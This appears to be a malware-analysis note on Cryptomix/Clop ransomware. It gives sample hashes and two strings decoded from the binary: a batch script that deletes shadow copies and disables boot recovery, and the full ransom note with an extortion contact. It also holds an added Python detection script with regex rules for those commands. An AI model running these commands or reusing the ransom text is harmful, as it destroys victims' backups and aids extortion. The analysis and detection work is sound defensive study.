cryptomix-clop-ransomware

Cryptomix Ransomware Mal Helper

Packed, digitally signed, crypted binary: SHA-256: 10f4be34c2e41e6c2d4932ab77f189cf5da659abd028537604eae6435c83516a

Unpacked ransomware binary: SHA-256: 79b8c37a5e2a32e8f7e000822cec6f2f4e317620a2296f1aa3f35b2374c396ec

Reference: https://twitter.com/malwrhunterteam/status/1098578106112245760

bytearray(b'@echo off\r\nvssadmin Delete Shadows /all /quiet\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded\r\nvssadmin Delete Shadows /all /quiet\t\t\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\t ')
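
A defender-side check for the command sequence in the batch script above, added here as an example and not part of the original repository: it flags hosts whose process-creation events show two or more of the script's recovery-inhibiting behaviours. The event tuples, host names, rule names and threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# One pattern per recovery-inhibiting behaviour seen in the dumped batch script.
RULES = {
    "vss_delete_all": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b.*/all\b", re.I),
    "bcd_recovery_off": re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\S+\s+recoveryenabled\s+no\b", re.I),
    "bcd_ignore_failures": re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\S+\s+bootstatuspolicy\s+ignoreallfailures\b", re.I),
}
RESIZE = re.compile(
    r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\s+/for=(?P<drive>[a-z]):.*/maxsize=(?P<size>\S+)", re.I)

def resize_cycles(cmdlines):
    """Drives whose shadow storage was capped at a fixed size, then set to unbounded."""
    capped, cycled = set(), set()
    for line in cmdlines:
        m = RESIZE.search(line)
        if not m:
            continue
        drive, size = m["drive"].lower(), m["size"].lower()
        if size != "unbounded":
            capped.add(drive)          # a lone cap can be routine administration
        elif drive in capped:
            cycled.add(drive)          # cap followed by unbounded, as in the script
    return cycled

def triage(events, threshold=2):
    """Map host -> sorted findings for hosts showing >= threshold distinct behaviours."""
    per_host = defaultdict(list)
    for host, cmdline in events:
        per_host[host].append(cmdline)
    alerts = {}
    for host, lines in per_host.items():
        found = {name for name, rx in RULES.items() for l in lines if rx.search(l)}
        if resize_cycles(lines):
            found.add("vss_resize_cycle")
        if len(found) >= threshold:
            alerts[host] = sorted(found)
    return alerts

# Constructed process-creation events (host, command line); not real telemetry.
SAMPLE = [
    ("ws-01", "vssadmin Delete Shadows /all /quiet"),
    ("ws-01", "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB"),
    ("ws-01", "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded"),
    ("ws-01", "bcdedit /set {default} recoveryenabled No"),
    ("ws-01", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ("srv-03", "vssadmin resize shadowstorage /for=d: /on=d: /maxsize=10%"),
]
```

`triage(SAMPLE)` reports only `ws-01`; the single resize on `srv-03` stays below the threshold.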

bytearray(b'!Your networks has been penetrated!\r\nAll files on each host in the network have been encrypted with a strong algorithm!!!\r\nBackups were either encrypted or deleted or backup disks were formatted!!!\r\nShadow copies also removed, so F8 or any other methods may damage encrypted data but not recover!!!\r\nWe exclusively have decryption software for your situation.\r\nNo DECRYPTION software is AVAILABLE in the PUBLIC.\r\n* DO NOT DELETE readme files.\r\n* DO NOT RENAME OR MOVE the encrypted and readme files.\r\n* DO NOT RESET OR SHUTDOWN \xe2\x80\x93 files may be damaged.\r\n!!!THIS MAY LEAD TO THE IMPOSSIBILITY OF RECOVERY OF THE CERTAIN FILES!!!\r\n!!!ALL REPAIR TOOLS ARE USELESS AND CAN DESTROY YOUR FILES IRREVERSIBLY!!!\r\nIf you want to restore your files write to emails. \r\n[CONTACTS ARE AT THE BOTTOM OF THE SHEET] and attach 2 - 3 encrypted files.\r\n[Less than 6 Mb each, non-archived and your files should not contain valuable information\r\n[Databases, backups, large excel sheets, etc.]]!\r\n!!You will receive decrypted samples and our conditions how to get the decoder!!!\r\n\r\n***ATTENTION***\r\n!!!YOUR WARRANTY - DECRYPTED SAMPLES!!!\r\nDO NOT TRY TO DECRYPT YOUR DATA USING THIRD PARTY SOFTWARE!!!\r\nWE DON`T NEED YOUR FILES AND YOUR INFORMATION!!!\r\n\r\nContacts E-MAIL: \r\nunlock@eqaltech.su \r\n\r\n***THE FINAL PRICE DEPENDS ON HOW FAST YOU WRITE TO US***\r\n===Nothing personal just business=== Clop^_-')